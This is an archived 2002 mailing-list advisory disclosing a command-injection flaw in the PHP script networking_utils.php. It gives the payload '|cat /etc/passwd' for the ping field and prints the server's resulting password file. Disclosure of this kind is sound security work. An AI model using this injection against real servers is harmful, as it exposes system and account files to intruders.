Title: The bug in networking_utils.php (http://www.sourcecraft.org/downloads) networking_utils(PHP) Show Files Vulnerability Summary: networking_utils.php Includes a ping function, a traceroute function, and an nslookup function. Vulnerable systems: networking_utils networking_utils.php of the networking_utils php script allows remote visitors to view any file on a webserver. Example: The command which is written to Domain name or Ip address part(Ping Utility): |cat /etc/passwd by this command, password file to view in the web browser. Ping Results For : |cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: mysql:x:415:415:MySQL server:/var/lib/mysql:/bin/bash cilek:x:501:501:cilek:/home/cilek:/bin/bash avicenna:x:502:502:Avicenna:/home/avicenna:/bin/bash __________________________________________________ Do you Yahoo!? HotJobs - Search new jobs daily now http://hotjobs.yahoo.com/
This archive was generated by hypermail 2b30 : Tue Nov 05 2002 - 13:34:17 PST